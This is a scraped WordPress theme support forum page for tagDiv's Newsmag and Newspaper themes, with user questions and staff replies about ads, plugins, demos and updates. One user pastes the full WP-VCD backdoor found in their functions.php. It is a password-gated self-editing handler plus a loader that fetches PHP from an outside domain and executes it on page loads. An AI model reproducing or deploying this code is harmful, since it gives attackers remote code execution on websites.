- NewsmagInstall via WordPress
- NewsmagInstall via FTP
- NewsmagInstalling pre-built websites
- NewsmagUsing the theme translations together with WPML
- NewsmagHow to update a plugin
- NewsmagNewsmag theme support
- NewsmagCustom Post Type Support
- NewsmagImport / Export theme settings
- NewsmagHow to add icons in the menu
- NewsmagRequirements for Newsmag
- NewsmagNewsmag documentation
- NewsmagHow to update the theme
- NewsmagBlock settings tutorial
- NewsmagHow to update the WPBakery plugin
- NewsmagIntroduction
- NewsmagMain menu
- NewsmagFeatured image or video
- NewsmagAuthor card
Hi,
It seems you have managed to create and set a header ad for the website at the moment
– https://www.screencast.com/t/zs5MThb6R
Also it links to a set URL and opens in a new tab. Please note that this banner will display on mobile, when the mobile theme is not active
– https://www.screencast.com/t/u1xc9Uve
If the mobile theme plugin is active, a header ad code has to be inserted in the mobile theme ad sections of the theme panel
– https://www.screencast.com/t/dBKQiua9Mh
More information about the mobile theme plugin and how it works, in this guide
– https://forum.tagdiv.com/the-mobile-theme/
Please note that the mobile theme is not required, you can chose not to install it. The main theme is fully responsive and will adapt the website for every device.
Thanks
Hi,
Notice that the speed booster is an optional plugin which can be activated in the same way as you install a new plugin.
The Speed Booster works only with the tested plugins. If you use other plugins, it will be automatically disabled, and I suggest to check this first in System Status. However there is a workaround to make it also work with other plugins, you can read more here
–> https://forum.tagdiv.com/topic/speed-booster-not-compatible-with-vaultpress/
Thanks for your understanding!
Hi,
I’m not sure why don’t you install a demo, like Black demo – https://demo.tagdiv.com/newspaper_black/
The theme doesn’t have an option to change the post content background. It is set to white by default and you will need custom modifications.
Try to install the demo without content and you will have that design without any additional modifications – https://forum.tagdiv.com/installing-demos/
Or if you want to do this manually for your site, you can take a look at the specific stylesheet file(for Black demo) and adjust it for your site – https://www.screencast.com/t/1kFtFbo0
Thanks!
Hi,
Please try to download the theme again from your themeforest account and reinstall it – https://forum.tagdiv.com/topic/menu-does-not-open-on-mobile-devices/#post-194543
If the issue persist, please send an email at contact@tagdiv.com and provide wp-admin access so we can take a closer look.
Thanks!
Hi,
The website could have security problems, if the code simply appears in the theme functions file without you entering it there. Please follow the suggestions from this topic concerning security
– https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/
– https://codex.wordpress.org/Hardening_WordPress
Scan the website and database for malware using suggested methods. If you have a child theme, disable it. Deactivate all plugins and re-install the theme by FTP
– https://forum.tagdiv.com/how-to-update-the-theme-2/
Then install only the plugins form the official theme package. Do not use any custom code in the theme panel sections, or directly in the theme files. Install security plugins that can help in these situations.
Thanks
Hello!
I want add some plugins from “Plugins” > “Add New”.
But “Add New” page is blank.
My Local:
* PHP7.1.4
* Nginx
* Local by Flywheel
Thanks
Hi,
I want to install the WPML plugin to my site but cant´t find any documentation here. Does the documentation for newspaper apply also?
https://forum.tagdiv.com/topic/have-problem-installing/
Поиск по форуму творит чудеса.
Hello,
I’ve recently purchased the Newspaper theme but when I try to install it via WordPress at the end of the upload I get redirected to a white screen with the message “Are you sure you want to do this” and a link “please try again”. Is the problem on the website itself and do you have any idea how this could be fixed? I’m new to WordPress so any sort of information will be appreciated.
Thanks
Petya
Hi,
The theme doesn’t change your domain name.
This is your subdomain name where you installed wordpress and the theme – https://www.screencast.com/t/HaruOozwLm I suggest to check your host documentation.
Thanks!
Hi,
The theme doesn’t have an option for this. You could install a demo which has the specific design like Magazine – https://demo.tagdiv.com/newspaper_magazine/
Or you can create a custom css for your site – https://forum.tagdiv.com/create-custom-code-using-the-browsers-inspector/
Thanks!
Hi,
What you did seems to have caused a lot of errors and warnings. Try re-installing the theme by FTP
– https://forum.tagdiv.com/newsmag-how-to-update-the-theme/
Check the plugin instructions, and make sure you have followed the exact steps when you made modifications to the database.
Thanks
Hi,
The categories will be displayed in alphabetical order, there is no option to change this functionality. If you want to do it, you could install a plugin like Category Order and Taxonomy Terms Order. Through this plugin you might be able to change how the sub-categories are displayed.
Thanks
Hello,
I have these four plugins installed and they are the only ones stopping speed booster from working.
1. google-analytics-for-wordpress/googleanalytics
2. Ninja Forms
3. Ninja Forms – File Uploads
4. Ninja Forms – Layout & Styles
Please help with the code to add to speed booster.php to get speed booster to work.
Thanks
If I comment out the code that causes speed booster to be disable, will I have an issue with any of these four plugins?
please help!
Hi.
I’ve been trying the registration module in my site. I created two new users using two different valid e-mail addresses. The e-mails with the passwords never arrived to any of those addresses. I properly checked spam sections in both cases; nothing at all.
I don’t know what’s happening. Please help. I am using craft ideas demo and I don,t have any plugin installated about registration.
ok, i disabled plugins and was Yoast Seo what i have to do? reinstall plugin?
Sometimes my ad is showing ads on my website. I can not prevent forwarding or iframe ads. I have a piece of code that can not be deleted in functions.php when I refresh the theme and other files.
This is unkown section in funtions.php
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '6708e20e039----------edit---426c0c'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code9\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
if ( ! function_exists( 'theme_temp_setup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
if($tmpcontent = @file_get_contents("http://www.dolsh.com/code9.php?i=".$path))
{
function theme_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
extract(theme_temp_setup($tmpcontent));
}
}
}
?>
function.php more code section..
<?php
/*
Our portfolio: http://themeforest.net/user/tagDiv/portfolio
Thanks for using our theme!
tagDiv - 2017
*/
/**
* Load the speed booster framework + theme specific files
*/
// load the deploy mode
require_once('td_deploy_mode.php');
// load the config
require_once('includes/td_config.php');
add_action('td_global_after', array('td_config', 'on_td_global_after_config'), 9); //we run on 9 priority to allow plugins to updage_key our apis while using the default priority of 10
// load the wp booster
require_once('includes/wp_booster/td_wp_booster_functions.php');
require_once('includes/td_css_generator.php');
require_once('includes/shortcodes/td_misc_shortcodes.php');
require_once('includes/widgets/td_page_builder_widgets.php'); // widgets
/*
* mobile theme css generator
* in wp-admin the main theme is loaded and the mobile theme functions are not included
* required in td_panel_data_source
* @todo - look for a more elegant solution(ex. generate the css on request)
*/
require_once('mobile/includes/td_css_generator_mob.php');
/* ----------------------------------------------------------------------------
* Woo Commerce
*/
// breadcrumb
add_filter('woocommerce_breadcrumb_defaults', 'td_woocommerce_breadcrumbs');
function td_woocommerce_breadcrumbs() {
return array(
'delimiter' => ' <i class="td-icon-right td-bread-sep"></i> ',
'wrap_before' => '<div class="entry-crumbs" itemprop="breadcrumb">',
'wrap_after' => '</div>',
'before' => '',
'after' => '',
'home' => _x('Home', 'breadcrumb', 'woocommerce'),
);
}
// use own pagination
if (!function_exists('woocommerce_pagination')) {
// pagination
function woocommerce_pagination() {
echo td_page_generator::get_pagination();
}
}
// Override theme default specification for product 3 per row
// Number of product per page 8
add_filter('loop_shop_per_page', create_function('$cols', 'return 4;'));
if (!function_exists('woocommerce_output_related_products')) {
// Number of related products
function woocommerce_output_related_products() {
woocommerce_related_products(array(
'posts_per_page' => 4,
'columns' => 4,
'orderby' => 'rand',
)); // Display 4 products in rows of 1
}
}
/* ----------------------------------------------------------------------------
* bbPress
*/
// change avatar size to 40px
function td_bbp_change_avatar_size($author_avatar, $topic_id, $size) {
$author_avatar = '';
if ($size == 14) {
$size = 40;
}
$topic_id = bbp_get_topic_id( $topic_id );
if ( !empty( $topic_id ) ) {
if ( !bbp_is_topic_anonymous( $topic_id ) ) {
$author_avatar = get_avatar( bbp_get_topic_author_id( $topic_id ), $size );
} else {
$author_avatar = get_avatar( get_post_meta( $topic_id, '_bbp_anonymous_email', true ), $size );
}
}
return $author_avatar;
}
add_filter('bbp_get_topic_author_avatar', 'td_bbp_change_avatar_size', 20, 3);
add_filter('bbp_get_reply_author_avatar', 'td_bbp_change_avatar_size', 20, 3);
add_filter('bbp_get_current_user_avatar', 'td_bbp_change_avatar_size', 20, 3);
//add_action('shutdown', 'test_td');
function test_td () {
if (!is_admin()){
td_api_base::_debug_get_used_on_page_components();
}
}
/**
* tdStyleCustomizer.js is required
*/
if (TD_DEBUG_LIVE_THEME_STYLE) {
add_action('wp_footer', 'td_theme_style_footer');
// new live theme demos
function td_theme_style_footer() {
?>
<div id="td-theme-settings" class="td-live-theme-demos td-theme-settings-small">
<div class="td-skin-body">
<div class="td-skin-wrap">
<div class="td-skin-container td-skin-buy"><a target="_blank" href="http://themeforest.net/item/newspaper/5489609?ref=tagdiv">BUY NEWSPAPER NOW!</a></div>
<div class="td-skin-container td-skin-header">GET AN AWESOME START!</div>
<div class="td-skin-container td-skin-desc">With easy <span>ONE CLICK INSTALL</span> and fully customizable options, our demos are the best start you'll ever get!!</div>
<div class="td-skin-container td-skin-content">
<div class="td-demos-list">
<?php
$td_demo_names = array();
foreach (td_global::$demo_list as $demo_id => $stack_params) {
$td_demo_names[$stack_params['text']] = $demo_id;
?>
<div class="td-set-theme-style"><a>" class="td-set-theme-style-link td-popup td-popup-<?php echo $td_demo_names[$stack_params['text']] ?>" data-img-url="<?php echo td_global::$get_template_directory_uri ?>/demos_popup/large/<?php echo $demo_id; ?>.jpg"><span></span></a></div>
<?php } ?>
<div class="td-set-theme-style-empty"><a href="#"></a></div>
<div class="td-set-theme-style-empty"><a href="#"></a></div>
<div class="clearfix"></div>
</div>
</div>
<div class="td-skin-scroll"><i class="td-icon-read-down"></i></div>
</div>
</div>
<div class="clearfix"></div>
<div class="td-set-hide-show"><a href="#"></a></div>
<div class="td-screen-demo" data-width-preview="380"></div>
</div>
<?php
}
}
//td_demo_state::update_state("art_creek", 'full');
//print_r(td_global::$all_theme_panels_list);
how can you solve this problem? I Know little english.
Hi.
I have installed wp smush plugin and I would like to active ” Resize my full images ”
What is the best max height and width for your theme to seems good like the deme version?
Is there any documentation related to my question?
Regards.
I just installed the template Newspaper in my blog, but the grid do not appear. I tried to configure the theme panel but the grid do not appear yet. What I need to do? I’m using the WordPress.
Hey there!
I just bought newspaper theme and i am working with wordpress( should be the latest version). I installed everything but when I want to create a new article i need to activate the Visual Composer.
But after 5 seconds of activation it all stops and you can read that the composer is “forbidden”. Without Visual Composer am I not able to do anything. But it simly doesnt work.
Do I need to do something with plugIn? Has anyone had the same problem?
I would be grateful for your help!
Thanx
Hello,
I would like to tell you that i have installed the default demo theme, i would like to know why does it says http://demo.wf.mk/2017/10/13/335/, demo at the begining of my website and how to remove it.
Thank you
Hristijan
I am running newspaper, however I do not have the plugin installed and it is working fine. Why does it say it is required?
Thanks
I think you have to re-activate if you upgrade from 3x to 4x; as new theme; or if you uninstall a demo and go back to the default setup.
There is a problem with the new version of WPBakery Visual Composer 5.4.2. We have version 8.1 of the theme installed
Hi,
The files seem to not be found. Please try to deactivate and delete the composer in the plugins section, and install it again
– https://www.screencast.com/t/Wc3Br0wX25ni
– https://www.screencast.com/t/n3VepyjjZ2
Then check if everything works properly.
Thanks